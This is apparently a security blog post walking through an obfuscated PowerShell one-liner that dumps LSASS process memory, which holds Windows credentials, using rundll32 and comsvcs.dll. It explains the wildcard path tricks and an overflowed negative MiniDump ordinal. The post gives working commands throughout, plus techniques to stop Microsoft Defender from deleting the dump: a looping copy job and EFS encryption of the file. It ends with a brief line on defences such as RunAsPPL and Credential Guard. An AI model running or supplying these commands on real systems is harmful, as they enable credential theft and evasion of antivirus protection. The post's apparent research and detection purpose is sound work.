Obfuscated LSASS dumper command

A quick walkthrough for a obfuscated PowerShell LSASS dump command via comsvcs.dll.


Malicious command detection for PowerShell is not easy. Pretty hard to tell, what the following command is going to do, huh?

&$env:???t??r???\*2\r[t-u]???[k-l]?2* $(gi $env:???t??r???\*2\c?m?[v-w]*l | % {
  $_.FullName }), `#-999999999999999999999999999999999999999999999999999999999999
  99999999999999999976-decoy $(gps l?a*s).id c:\t??p\dmp.log full;
  • Commands can contain $env variables
  • including wildcards for the path
  • functions of dlls can be called via the ordinal
  • ordinal can be in a negative form
  • Defender fails to delete dump via WebDAV
  • Defender fails to remove all dumps

Take me to the PoC


After publishing the LSASS dump command in the last blogpost, some questions were asked. Yes, really somebody is reading the blog and asking questions about, yeay :)
So here is a quick walkthrough.


To understand what is going on, we need to split this command.

&$env:???t??r???\*2\r[t-u]???[k-l]?2* $(gi $env:???t??r???\*2\c?m?[v-w]*l 
  | % { $_.FullName }), `#-9999999999999999999999999999999999999999999999999999999
  99999999999999999999976-decoy $(gps l?a*s).id c:\t??p\dmp.log full;

First part resolves to rundll32.exe via $env = C:\Windows. The “&” executes the binaries, if there would be more than one hit, it would run all of them.

ls "$env:???t??r???\*2\r[t-u]???[k-l]?2*"

    Verzeichnis: C:\Windows\System32

Mode                 LastWriteTime         Length Name                                                                                                                                                                               
----                 -------------         ------ ----                                                                                                                                                                               
-a----        05.02.2021     20:16          71680 rundll32.exe             

Another obfuscated variant: &${env:S????????T}$($env:L?????????R[$?])S??????2$($env:L?????????R[$?])r[t-u]???[k-l]?2* found here: https://twitter.com/_JohnHammond/status/1583212890529886208

Second we reference comsvcs.dll, the famous dll for memory dumps. We need the gi = Get-Item wrapped around as we need the full name of the binary.

 $(gi $env:???t??r???\*2\c?m?[v-w]*l | % { $_.FullName })

So far we have C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, quite basic. Next part is a little bit tricky.
stated, that we can “overflow” the ordinal value and as the MiniDump function have a ordinal of 24 we can just use that big negative number. Additionally, non numbers are getting ignored, so we can fill up with some decoy at the end.


To get the ordinal we can look up the PE export table with a tool like pe-bear. MiniDump ordinal in HEX

As a last step, we need the PID of the lsass.

 $(gps l?a*s).id
 $(Get-Process lsass).id


If we run the command in an admin PowerShell, we see that the lsass is indeed getting dumped. Dump the lsass

However, the defender is picking the dump up and deleting it.

Avoid deletion of LSASS Dump

As stated in the last blog post, there are some ways to prevent the defender from deleting the dump file, e.g. by using WebDAV or other file systems.

A really stupid variant is to copy the dump file, which will still trigger an alert, but keeps the copy for harvesting.

start-job { cd e:; while ($true) { cp dmp.log dmp.log2;}}

Copy the dump to “trick” Defender

Please Note, that this is technique is not 100% reliable, but worked like 90% during my tests. There are better options, but that’s a point for the next post.

Another possibility is to use the integrated encryption of files (EFS). Defender fails to delete the file then.

&$env:???t??r???\*2\r[t-u]???[k-l]?2* $(gi $env:???t??r???\*2\c?m?[v-w]*l | % {
  $_.FullName }), `#-999999999999999999999999999999999999999999999999999999999
  999999999999999999999999976-decoy $(gps l?a*s).id dmp.tmp full; Wait-Process
   -Id (Get-Process rundll32).id ; (Get-Item -Path E:\dmp.tmp).Encrypt();

Defender fails to delete the encypted file

We can then parse the dump with the typical tools offline, or directly via the parser from a college PowerExtract.
Note: You still need to move the file to somewhere “safe”, as the defender will detect the dump if you open the file.


RunAsPPL or CredentialGuard protects against this kind of lsass dumping attacks. Do not rely on PowerShell command line analysis for detection.


Work and inspiration from others, thanks for that:

http://www.hexacorn.com/blog/2020/02/05/stay-positive-lolbins-not/ \